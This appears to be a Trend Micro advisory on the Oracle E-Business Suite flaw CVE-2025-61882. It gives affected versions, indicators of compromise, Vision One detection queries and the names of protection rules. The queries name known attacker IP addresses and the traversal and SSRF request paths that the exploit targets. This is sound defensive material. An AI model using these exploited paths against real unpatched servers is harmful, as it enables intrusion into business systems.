• Server-Side Request Forgery (SSRF)
• Carriage Return/Line Feed (CRLF) Injection 
• HTTP Persistent Connections
• Authentication Filter Bypass
• XSL Transformation (XSLT)

Impacted versions of Oracle E-Business Suite include versions 12.2.3 through 12.2.14, and Oracle customers are advised to contact their authorized support provider as soon as possible to obtain and apply the necessary patches as soon as possible.

Oracle has provided a handful of Indicators of Compromise (IOCs) that may help in investigation to exposure:

Trend Micro Investigation, Protection and Detection Against Exploitation

In addition to the Oracle critical patches that should be applied as soon as possible, Trend Micro has also released some updates and proactive rules/filters that can help provide additional protection against potential exploits as well as some tools that can be used by customers to investigate potential exposure to vulnerabilities.

Trend Vision One

Threat Insights

Trend Vision One Threat Insights provide threat intelligence curated by Trend Micro experts that administrators can base critical security decisions on with timely reports on emerging threats.

Search Query

Customers may utilize the General Search Query function in Vision One to do some preliminary investigation of potential exposure by utilizing the following queries:

Suspicious Outbound Connection
eventSubId:204 AND (dst:185.181.60.11 OR dst:200.107.207.26)

Detect outbound HTTP(S) connections from Oracle EBS server to non-whitelisted/external IPs
eventId:3 AND eventSubId:204 AND processFilePath:*oacore* AND NOT objectIp:10.* AND NOT objectIp:192.168.*

CVE202561882 Artifact Detection
malName:*Python.CVE202561882* AND eventName:MALWARE_DETECTION AND LogType: detection

Detect requests or file access attempts to /OA_HTML/help/../ieshostedsurvey.jsp for auth bypass and exploitation
eventId:3 AND eventSubId:204 AND request:*OA_HTML/help/../ieshostedsurvey.jsp*

Detect HTTP POST requests to vulnerable UiServlet endpoint, indicating SSRF activity
eventId:3 AND eventSubId:204 AND request:*configurator/UiServlet*

Utilizing Observed Attack Techniques (OAT)

Vision One customers that use Trend Micro endpoint and server protection products may go into the Observed Attack Techniques section of the Vision One console to look for suspicious activity that may indicate the detection of malicious behavior associated with this threat.

Potential indicators include:

• Oracle E-Business Suite CRLF Injection Vulnerability (CVE-2025-61882)
• Oracle E-Business Suite Vulnerability (CVE-2025-61882)
• CVE-2025-61882 Oracle Remote Code Execution Exploit HTTP (Request) - Outbound
• CVE-2025-61882 Oracle Remote Code Execution Exploit HTTP (Request) - Inbound
• Creation or Modification of Suspicious Java Files in Oracle Directories

Trend Vision One Endpoint Security

Trend Vision One - Endpoint Security, Deep Security & Vulnerability Protection IPS Rules

• 1012464 - Oracle E-Business Suite CRLF Injection Vulnerability (CVE-2025-61882)

Trend Vision One Network Security

TippingPoint and Trend Cloud One - Network Security Filters

• 46513: HTTP: Oracle E-Business Suite Concurrent Processing Pre-Auth Command Execution Vulnerability

Trend Micro Deep Discovery Inspector (DDI) Rules

• 5536: CVE-2025-61882_HTTP_ORACLE_RCE_EXPLOIT_REQUEST_SB

Patterns, Models, Signatures

Trend Micro Endpoint and Server Malware Pattern (VSAPI) Detection

Trend Micro products that utilize different pattern, behavior monitoring and other advanced detection technology can also detect and protect against the following known malicious components associated with in the wild exploits:

• Backdoor.Python.CVE202561882.A

Trend Micro Web Reputation Services (WRS)

Trend Micro is also blocking several known C&C server and Disease Vector IPs and domains known to be associated with these exploits.